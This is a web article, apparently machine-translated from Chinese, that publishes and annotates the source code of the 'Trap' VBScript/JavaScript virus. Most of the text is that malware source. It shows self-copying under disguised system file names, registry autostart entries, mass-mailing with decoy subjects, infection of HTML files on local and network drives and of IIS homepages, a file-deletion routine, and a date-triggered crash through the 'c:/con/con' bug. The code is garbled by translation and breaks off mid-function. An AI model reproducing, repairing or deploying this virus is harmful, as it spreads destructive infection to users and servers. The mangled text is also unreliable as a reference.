"Trap" virus source code is unveiled

zhaozj2021-02-17  68

In the beginning of July, there was a new vicious virus called "Trap" (TRAP), which has been fully explosive on July 5. At present, there have been a lot of websites and users from "trap" attacks, resulting in network systems.痪, the loss of documents is serious. The virus is a network scripting language virus, and it is also written in both VBScript and JavaScript, which spread through Outlook email (without opening mail can also be infected), infected file spread, strong communication ability, and Can directly attack the Microsoft IIS server homepage file, causing website infection, and is infected when visiting the website of the viral infection. From the virus attack object, "trap" is probably "domestic" virus, but it is understood that the virus is actually in June, first in South Korea. I am very unfortunately encountered "trap" attack, resulting in computer blue screen on July 5, and I have studied the source code of "trap". After some effort, I finally reveal the principle of code, the following is the third process of "trap" And the source code is detailed. The virus has its own encryption capabilities (using JavaScript coding technology), making ordinary users unable to see the virus origin, but there is no encryption in the infected VBS file, so as an entry point, I have a very easy source code. '@ Thank you! Make use of other person to get rid of an enemy , Mswkey, HCUW, Code_Str, VBS_STR, JS_STR DIM Defpath, Smailc, Max_Size Dim WHB (), Title (10) Smailc = 4

Redim WHB (SMAILC) 'White House Related Personnel Mail List

WHB (0) = "president@whitehouse.gov" WHB (1) = "vice.president@whitehouse.gov" WHB (2) = "first.lady@whitehouse.gov"

WHB (3) = "mrs.chey@whitehouse.gov"

'The theme of sending an email

Title (0) = "Thanks for Helping Me!" Title (1) = "The Police Are Investigating The Robbery" Title (2) = "An Application for a Job" Title (3) = "The Aspects of An Application Process Pertinent TO OSI "Title (4) =" What a pleasant weather. why not go out for a walk? "Title (5) =" these Countries Have Gone / Been Through Too Many Wars "Title (6) =" Weide Fixed On The 17th of April for the Wedding "Title (7) =" Title (8) = "The Sitting IS Open!" Title (9) = "DEFPATH =" C: /README.HTML "'virus file

Max_size = 100000 'Defines the maximum size of infectious files

Mswkey = "HKEY_LOCAL_MACHINE / SOFTWARE / Microsoft / Windows /" HCUW = "HKEY_CURRENT_USER / SOFTWARE / Microsoft / WAB /" Main

Sub main () 'main program

ON Error ResMe Next Dim W_S

W_S = wscript.scriptfullname 'to get the path of the virus file itself

IF w_s = "" ". Err.clear

SET FSO = CREATEOBJECT ("scripting.filesystemObject") "Create a file system object

IF geterr the 'identifying virus status

Randomize 'initialization random seed

Ra = int (RND () * 7) 'generates a random number

Doucment.write Title (ra) 'writes random content

ExecuteMail 'When executing the message status


ExecutePage 'When executing a web page status


Executevbs' Programs when performing VBS file status

End if End Sub Function GeterR () ignores Error If Err.Number <> 0 THETERR = True Err.Clear Else Geterr = FALSE END IF END FUNCTION

Sub executePage () program when () 'web page status

On Error ResMe Next Dim HTML_STR, ADI, WDF, WDF2, WDF3, WDSF, WDSF2, VF

VBS_STR = getScriptcode ("VBScript") 'Get VBScript code

JS_STR = getJavaScript () get JavaScript code

Code_Str = Makescript (Encrypt (VBS_STR), TRUE) 'Gets encrypted script code HTML_STR = Makehtml (Encrypt (VBS_STR), TRUE)' Get encrypted complete HTML code


'Define the path to the virus file

WDSF = W2 & "MDM.VBS" WDSF2 = W1 & "Profile.vbs"

WDF = W2 & "User.dll" 'Note WDF and WDF3 two files are very confused

WDF2 = W2 & "Readme.html" WDF3 = W2 & "System.dll"

'Creating a virus file

Set vf = fso.opentextfile (WDF, 2, true) vf.write vbs_str vf.close set vf = fso.opentextFile (WDSF, 2, true) vf.write vbs_str vf.close set vf = fso.opentextfile (WDSF2, 2 , True) vf.write vbs_str vf.close set vf = fso.opentextfile (WDF2, 2, true) vf.write html_str vf.close set vf = fso.opentextFile (WDF3, 2, true) vf.write code_str vf.close Modify the registry, let the virus file start automatically execute WriteReg Mswkey & "CurrentVersion / Run / MDM", WDSF, "WriteReg Mswick &" CurrentVersion / Runservices / Profile ", WDSF2," "

Sendmail 'Execute Send Mail Programs

Hackpage 'Performs Infection Website Program

Set adi = fso.drives for Each X in Adi

If x.drivestype = 2 or x.drivestype = 3 TEN 'Traces all local hard drives and network sharing hard drives

Call searchhtml (x & "/") 'Execute a file infection

Endiff next

If Testuser Ten 'Check User

Killhe performs delete file operations ELSE

If Month (Date) & day (date) = "75" THEN ', if the system time is July 5

Set vf = fso.opentextfile (W2 & "75.htm", 2, true) 'Creating a system attack file

vf.write makescript ("Window.naviGate ('c: / con / con');", false) vf.close

WriteReg Mswkey & "CurrentVersion / Run / 75", W2 & "75.htm", "" "automatic startup

WINDOW.NAVIGATE "C: / Con / Con" is immediately blue screen, using Windows bug, can cause 100% crash in Win9x system (ie, unrecoverable blue screen)

Else 'is not 7.5

IF fso.fileexists (W2 & "75.htm") THEN FSO.DELETEFILE W2 & "75.htm" 'Delete 75.htmend IF End IF

If fso.fileexists (defpath) Then fso.deletefile defpath 'Delete C: /Readme.html virus file

End Sub

Sub executemail () program executed when mail status

On Error ResMe next VBS_STR = GetScriptCode ("VBScript") js_str = getjavaScript ()

SET STL = CREATEOBJECT ("Scriptlet.Typelib") 'Creating a TypeLib object

With stl .reset .path = defpath .doc = makehtml (Encrypt (VBS_STR), TRUE

.Write () 'Creating a C: /Readme.html file

End with window.open defpath, "trap", "width = 1 height = 1 menubar = no scrollbars = no barbar = no" opens the window end SUB

Sub Executevbs () The reason, such as the virus file is executed when VBS is VBS

on error resume next dim x, adi, wvbs, ws, vf set fso = CreateObject ( "Scripting.FileSystemObject") set wvbs = CreateObject ( "WScript.Shell") Gf wvbs.RegWrite MSWKEY & "Windows Scripting Host / Setings / Timeout ", 0," REG_DWORD "set vf = fso.opentextfile (W2 &" System.dll ", 1) code_str = vf.readall () vf.close Hackpage Sendmail Set Adi = fso.drives for Each X in Adi IF X. Drivestype = 2 or x.drivestype = 3 THEN CALL SEARCHTML (X & "/") End if Next If Testuser Ten Killhe End Sub

SUB GF () 'Getting System Path

W1 = fso.getspecialfolder (0) & "/" w2 = fso.getspecialfolder (1) & "/" End Sub

Function Readreg (key_str) 'Read Registry

SET TMPS = CreateObject ("wscript.shell") readreg = tmps.regread (key_str) set tmps = Nothing end function

Function WriteReg (Key_STR, NewValue, VTYPE) 'Write Registry

set tmps = CreateObject ( "WScript.Shell") if vtype = "" then tmps.RegWrite key_str, Newvalue else tmps.RegWrite key_str, Newvalue, vtype end if set tmps = Nothing end functionfunction MakeHtml (Sbuffer, iHTML) 'create an HTML file Complete code

Dim randomize ra = int (RND () * 7) makehtml = "<" & "html> <" & "head> <" & "title>" & title (ra) < "&" / Head> "& _ & vbcrlf & makescript (sbuffer, html) & vbcrlf & _ <" & "/ bag> <" & "/ html>" End Function

Function Makescript (CODESTR, IHTML) 'This program is a virus to self-encrypt the process, which is more complicated, no longer described.

If html dam docuwrite docuwrite = "Document.write ('<' " & "'script language = javascript> / n' " & _ "jword" & " '/ n '); "DOCUWRITE = Docuwrite & Vbrlf &" Document.write (' <' "&"' script language = vbscript> / n ' "& _" NWORD "&" ' / n ');" Makescript = "<" Script language = javascript> "& vbcrf &" var jword = "& _ chr (34) & encrypt (js_str) & chr (34) & vbcrf &" Var nword = "& _ chr (34) & CODESTR & CHR (34) & vbrlf &" nword = unescape (nword); "& VBCRLF & _" JWORD = Unescape (jword); "& Vbcrf & Docuwrite & Vbcrlf &" "else makesscript = <" "Script language = JavaScript>" & CodeStr & "